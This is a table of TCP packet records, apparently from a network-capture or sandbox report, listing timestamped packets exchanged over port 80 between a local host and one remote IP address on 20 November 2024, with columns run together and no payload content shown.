                                                                Nov 20, 2024 05:02:18.981883049 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.981883049 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.982079029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.982095003 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.982111931 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.982151985 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.982152939 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.982202053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094402075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094505072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094526052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094535112 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094541073 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094549894 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094558954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094568968 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094578981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094584942 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094618082 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094645977 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094769001 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094779968 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094789982 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094818115 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094846964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094849110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094867945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094880104 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094892025 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094909906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094938993 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.094950914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.094965935 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095015049 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095015049 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095060110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095081091 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095119953 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095119953 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095143080 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095191002 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095205069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095216036 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095225096 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095259905 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095259905 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095499039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095515013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095525026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095540047 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095549107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095551968 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095561981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095571995 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095572948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095592022 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095627069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095627069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095680952 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095731020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095768929 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095813036 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095824957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095833063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095865965 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095896006 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095906019 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095917940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095930099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095941067 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.095963955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095963955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.095985889 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096366882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096415043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096425056 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096427917 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096436024 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096460104 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096487999 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096492052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096513033 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096544981 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096585989 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096791029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096838951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096847057 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096854925 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096887112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096908092 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096915960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096925974 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096935987 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.096959114 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.096987963 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.097227097 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.097249031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.097271919 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.097301960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.099417925 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.099426985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.099478960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.099510908 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207556963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207568884 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207580090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207632065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207679987 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207700014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207710981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207720995 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207735062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207751036 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207760096 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207771063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207773924 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207773924 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207792044 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207801104 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207809925 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207811117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207809925 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207828045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207838058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207849979 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.207854033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207854033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207879066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.207895994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208007097 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208015919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208025932 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208044052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208054066 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208060980 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208065033 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208089113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208089113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208123922 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208276033 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208308935 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208319902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208328962 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208357096 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208580971 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208591938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208600998 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208632946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208652973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208658934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208663940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208674908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.208703995 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.208734989 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209197998 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209216118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209224939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209248066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209278107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209289074 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209300041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209319115 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209338903 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209367037 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209775925 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209786892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209796906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209825993 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209856033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209860086 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209872007 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.209903002 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.209947109 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.210210085 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210220098 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210231066 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210263014 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.210263014 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.210270882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210282087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210289955 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210316896 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.210346937 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.210689068 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210696936 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210706949 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210717916 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210726976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210736036 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.210736990 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.210755110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.210782051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.211273909 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.211283922 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.211293936 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.211308002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.211329937 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.211338997 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327497959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327543974 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327578068 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327629089 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327666044 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327677011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327687025 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327696085 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327719927 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327719927 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327733040 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327745914 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327773094 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327832937 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327866077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327879906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327908993 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.327910900 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.327956915 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.407984018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.407994986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408004999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408010960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408072948 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408072948 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408114910 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408132076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408142090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408152103 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408162117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408165932 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408170938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408185959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408198118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408209085 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408209085 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408216000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408226967 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408241034 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408241034 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408245087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408256054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408263922 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408273935 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408288002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408294916 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408308029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408313036 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408324957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408335924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408344030 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408344030 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408349037 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408358097 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408365011 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408389091 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408389091 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408624887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408643961 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408653021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408683062 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408683062 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408740997 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408757925 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408767939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408776999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408788919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.408792019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408811092 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.408835888 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409379959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409399033 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409408092 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409424067 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409452915 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409476995 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409487009 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409496069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409507036 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409512997 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409523010 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409542084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409554958 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409800053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409842014 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409890890 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409900904 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409912109 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409921885 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409931898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409940004 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409943104 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409954071 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.409959078 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409981012 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.409996033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410141945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410175085 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410182953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410183907 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410208941 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410211086 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410222054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410222054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410250902 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410260916 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410265923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410276890 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410285950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410312891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410329103 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410671949 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410689116 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410701036 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410710096 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410718918 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410722017 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410728931 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410739899 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410749912 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410758018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410769939 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410790920 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410805941 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.410948992 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410965919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.410995007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.411005974 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.411016941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.411062002 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.411089897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.411101103 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.411112070 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.411122084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.411132097 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.411134958 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.411159992 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.411175013 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.412137985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.412147045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.412157059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.412184000 CET4973080192.168.2.4185.156.72.65
